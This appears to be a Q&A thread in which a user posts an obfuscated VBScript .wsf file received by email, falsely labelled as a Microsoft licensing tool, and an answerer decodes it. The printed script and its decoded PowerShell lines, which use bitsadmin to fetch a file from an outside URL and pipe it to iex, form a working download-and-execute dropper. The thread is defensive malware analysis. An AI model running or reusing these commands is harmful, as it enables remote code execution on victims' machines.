Search code examples
vbscriptvirustrojan

Is this VB script potentially dangerous?

this morning I received a mal containing, among other things, a file with the extension .wsf, on which I inadvertently clicked.

I immediately realized that I had made a mistake ... but too late :( Can you tell me if it is malicious code?

Here is the code:

<package><job id="zXGYF_83"><script language="VBScript">
' Version: 10.7.91
'
' Copyright (c) Microsoft Corporation. All rights reserved.
'
' Windows Software Licensing Management Tool.
'
 Set ISUaUv=WScript.CreateObject("WScript.Shell")
jpHg="&&wp|2vixrm`)exehtte)$wp|2vixrm3^694Q;4W4;WWPHJH3veqs3qsg2oveqlxm{qm33>wtxxl$GVwvpMHv$vijwrevx3$$rmqhewxmf*&&$g1$ppilwvi{stdev$$|im€$Qp($?krmvxW1xyS$€wp|2vixrm`)exehtte)$gkAQp($*$$g1$$ppilwvi{st"
arr=split(jpHg,"dev")
For Each nEZVNX In arr
KcSOUa=""
fInEJ=Len(nEZVNX) - 1
For intI = 0 to fInEJ
KcSOUa=chr(Asc(Mid(nEZVNX,intI + 1 ,1 ))+0-4)+KcSOUa
Next
ISUaUv.run KcSOUa,false,-1
Next

</script></job></package>

Thank you!

Solution

  • The fact it obfuscates itself is a good indicator it maybe malicious, if you want to see what it's attempting to run you can;

    Comment out this line (like below);

    'ISUaUv.run KcSOUa,false,-1

    Add this line below it;

    WScript.Echo KcSOUa

    When you run the script you will get this output;

    Output:

    powershell -c ""&bitsadmin  /transfer rDIlrsRC https://imwithmark.com/omar/DFDLSS70S07M052Z/inter.xls %appdata%\inter.xls""
powershell  -c  & $lM=gc %appdata%\inter.xls| Out-String; $lM |iex

    Judging by the first line, the script is using the BITSAdmin service (built into Windows) to initiate a download from the remote URL into a local XLS file stored inside your user profile AppData folder. As for the second, I'm not clear on what that does but someone with more PowerShell knowledge will be able to shed light on it.

    Update

    It looks to be using gc (Get-Content applet in PowerShell) to pull the content of the file into a string using the Out-String command. It then pipes this to iex (Invoke-Expression command) to be executed.

    The likelihood is the inter.xls file that was downloaded contains malicious commands that are then being locally executed in the context of the local system. This is a classic script kiddie hack to get around remote code execution.